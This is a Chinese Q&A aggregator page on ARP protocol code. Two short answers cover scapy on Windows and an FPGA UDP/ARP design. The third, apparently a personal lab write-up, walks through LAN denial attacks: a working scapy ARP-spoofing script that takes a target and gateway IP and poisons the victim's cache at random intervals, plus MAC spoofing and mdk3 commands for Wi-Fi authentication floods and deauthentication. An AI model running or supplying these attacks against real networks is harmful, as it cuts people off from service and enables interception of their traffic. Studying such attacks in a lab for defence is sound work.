當前位置:首頁 » 操作系統 » arp協議源碼

arp協議源碼

發布時間: 2025-04-15 11:18:01

『壹』 小白求助,scapy模塊中無法使用ARP

我也是一直沒有解決這個問題 但是今天突然發現scapy是有這個類的,但是好像是因為某些原因windows用不了這個 我在Linux里打開scapy

發現LINUX里貌似是可以用的,初步推斷是因為平台的問題 因為看了一下源碼 有一部分是判斷執行的平台的,scapy把windows和其他系統分開了 不知道是什麼原因 但是Linux好像是可用的

已經解決了 我在LINUX平台下實驗成功,Linux是可用的

『貳』 FPGA純verilog實現UDP通信,三速網自協商仲裁,動態ARP和Ping功能,提供工程源碼和技術支持


FPGA純verilog設計實現了一套全面的UDP通信系統,包含自協商仲裁、動態ARP和Ping功能,旨在簡化用戶介面,提供直觀易用的工程源碼支持。本文將詳細介紹設計的各個部分和實際應用實例。


1. 問題與現有解決方案


市面上的UDP實現存在局限,如缺乏ping功能、代碼不公開或需要額外的license。本設計旨在解決這些問題,採用Micrel的KSZ9031RNX網路PHY晶元,以verilog實現:



  • 精簡版UDP:提供Kintex7和Artix7的示例,僅含數據回環,無ping功能,節省資源。

  • 視頻傳輸方案:基於精簡版UDP,支持OV5640視頻傳輸,有網線介面。

  • 官方三速網IP:速度快,數據量大,但需要license且功能單一。

  • 帶ARP和ping的UDP:適用於Xilinx Kintex7和Artix7,支持數據回環。


2. 詳細設計


實驗基於RGMII通信,設計包括MAC層的發送和接收,以及IP層的ARP和UDP功能。MAC發送模塊支持動態ARP和UDP/Ping,通過FPGA內部RAM回環數據,以驗證功能。IP層採用樹型加法結構計算校驗和,保證數據的准確性。


3. 實現模塊
-

    - MAC發送:處理ARP和UDP數據,有預定義的發送模式。
    - ARP發送:支持ARP請求和應答。
    - IP發送:區分UDP和ICMP,校驗和計算方法一致。
    - UDP發送:處理數據寫入、校驗和計算及發送。
    - MAC接收:解析MAC頭部,執行CRC校驗,處理ARP和IP數據。
    - ARP接收:處理ARP請求和應答,存儲接收到的地址信息。
    - IP接收:提取IP首部信息,校驗和檢查,處理UDP或ICMP數據。

4. 網路配置和調試


- 通過SMI讀寫控制管理PHY配置,實現10/100/1000M自適應和仲裁,涉及GMII-RGMII轉換。
- 經過上板調試驗證,包括ping測試、數據收發和速度切換測試,確保功能正常。
5. 獲取工程代碼

為了方便用戶,工程代碼提供網盤鏈接下載,具體內容詳盡且可直接應用於實際項目中。


『叄』 如何在路由器上屏蔽部分網址局部網路屏蔽

如何在路由器上屏蔽部分網址(局部網路屏蔽)
有線網路屏蔽
ARP官方釋意:地址解析協議,即ARP(AddressResolutionProtocol),是根據獲取的一個。發送信息時將包含目標IP地址的ARP請求廣播到區域網絡上的所有主機,並接收返回消息,以此確定目標的物理地址(MAC);收到返回消息後將該IP地址和物理地址存入本機ARP緩存中並保留一定時間,下次請求時直接查詢ARP緩存以節約資源。
實驗環境:
Linuxparrot(攻擊系統)
Linuxcentos(被攻擊系統)
實驗語言:python
Arp協議是網路不可缺少的一部分,由於arp協議存在一些不可修復的漏洞所以駭客也經常利用這個漏洞進行區域網攻擊。攻擊大致分為兩種。(1)純粹的網路攻擊,迫使受害者無法使用網路(2)目的性攻擊,arp欺騙獲取區域網使用者的信息,盜取賬號密碼等敏感信息。
筆者的電腦是接入寢室網路的,本來想使用真實電腦作為攻擊目標,鑒於室友正在使用,轉移到虛擬機進行實驗。
搭建實驗環境
Linuxparrot(攻擊系統)
Linuxcentos(被攻擊系統)
我們可以看到終端顯示的信息(網關一般是默認的)
攻擊系統IP:192.168.163.146MAC:00:0c:29:41:75:aa
被攻擊者IP:192.168.163.150MAC:00:0c:29:0b:09:89
網路測試依次使用兩台機器ping網路顯示信息如下
此信息說明可以連接外網,證明目前可以上網
使用攻擊系統掃描本網段的信息,使用到的工具fping
掃描到目標IP使用arp-a命令確認一下信息如下:
確認無誤,我的區域網中網關以2結尾,所以我們展開192.168.163.2和192.
168.163.150之間的攻擊。
使用python的scapy模塊,編寫對應的ARP包進行發送,由於scapy有獨立的交互模式,我們就直接在終端中進行編程。注意這里要進入root許可權
核心源代碼如下:
>>>a=ARP()
>>>a.show()
###[ARP]###
hwtype=0x1
ptype=IPv4
hwlen=None
plen=None
op=who-has
hwsrc=00:0c:29:41:75:aa
psrc=192.168.163.146
hwdst=00:00:00:00:00:00
pdst=0.0.0.0
>>>a.psrc='192.168.163.2'
>>>a.pdst='192.168.163.150'
>>>send(a,loop=1)
正在攻擊目標
驗證:
Ping網路沒有反應,網關mac地址也被修改為攻擊機的MAC地址
Python代碼:
fromscapy.allimport*
importtime
importrandom
pdst=str(input("目標IP:"))
gw=str(input("網關IP:"))
a=ARP()
a.pdst=pdst
a.psrc=gw
a.hwsrc='b4:1e:89:20:43:A1'
while1:
send(a,loop=0)
time.sleep(random.uniform(10,5))
無線網路屏蔽
無線網路攻擊相對上面的操作更加簡單,純工具攻擊方案。首先需要一個攻擊系統,我選用parrotsecurity系統,因為這個系統整合的工具比較全,現對於kali來說雖然沒有什麼較大的優勢但是他的UI界面做的相當的好。
插入無線網卡
可以看到無線網卡被命名為了wlan0(因為一般都是這樣命名的),使用airmon-ng將無線網專為mon模式,在這之前最好把網卡mac地址改變一下(我也不知道有什麼用總之這樣改感覺謹慎一些):
ifconfigwlan0down
Macchanger-mMACwlan0
ifconfgwlan0up
airmon-ngstartwlan0
接下來就可以使用wlan0mon進行無線網的查看了,記住名字已經變成wlan0mon了
使用airomp-ngwlan0mon或者wifete
打開就立刻掃到這兩個wifi,實驗目標是ruijie(傳說中的我打我自己,吐槽一下銳捷客戶端,不能開wifi就算了連虛擬機都不能用,讓計算機專業的學生怎麼搭建環境,雖然我不是計算機專業)。
直接開始攻擊mdk3wlan0mona-iMAC-s速率
從連接狀況可以看出來有大量的mac地址請求建立連接,當然我的手機已經沒網了,大概就是0-20秒網路變的卡頓,之後完全失去網路通訊,當然這只是一個AP的攻擊想要實現一定范圍的網路中斷其實也就是一個命令的事。mdk3wlan0mond-w白名單AP的mac-b黑名單AP的mac-c信道。回車鍵敲下去後果可想而知,網卡可能會壞掉哈哈…
這兩種攻擊方式有點不一樣,第一個是洪水攻擊利用大量的偽造mac迫使AP無法正常提供服務,第二種是直接進行解除認證。
Aircrack-ng套裝是專門針對無線的一套工具,mdk3是專用的攻擊工具,除了上面的案例還有許多可研究的使用方法。
總結:
兩種比較常見的區域網攻擊手段,單個拿出來看似確實沒什麼,但是兩個組合在一起完全可以製造一個網路屏蔽空間,對目標造成一定的危害,雖然是區域網,但也請不要隨意對他人使用,具體的防禦方法在其他的文章中也有講述,ARP攻防那篇文章有講到如何預防ARP攻擊,無線攻擊預防方案只能在路由中進行設置,有些到目前為止都還沒找到合適的防禦方案。

熱點內容
sql中selectinto語句 發布:2025-04-25 17:14:14 瀏覽:219
pilpython安裝 發布:2025-04-25 17:12:55 瀏覽:804
安卓手機usb偏好設置在哪裡 發布:2025-04-25 17:02:53 瀏覽:573
梁箍筋加密區間 發布:2025-04-25 17:02:10 瀏覽:425
大同忘記密碼找回多少錢 發布:2025-04-25 16:55:22 瀏覽:985
手機ip被加入黑名單限制訪問 發布:2025-04-25 16:40:51 瀏覽:731
內網的伺服器地址怎麼查 發布:2025-04-25 16:29:32 瀏覽:926
視頻緩存下載瀏覽器 發布:2025-04-25 16:21:53 瀏覽:1002
批量抖音腳本 發布:2025-04-25 15:58:10 瀏覽:836
運行極品飛車電腦要有什麼配置 發布:2025-04-25 15:51:35 瀏覽:418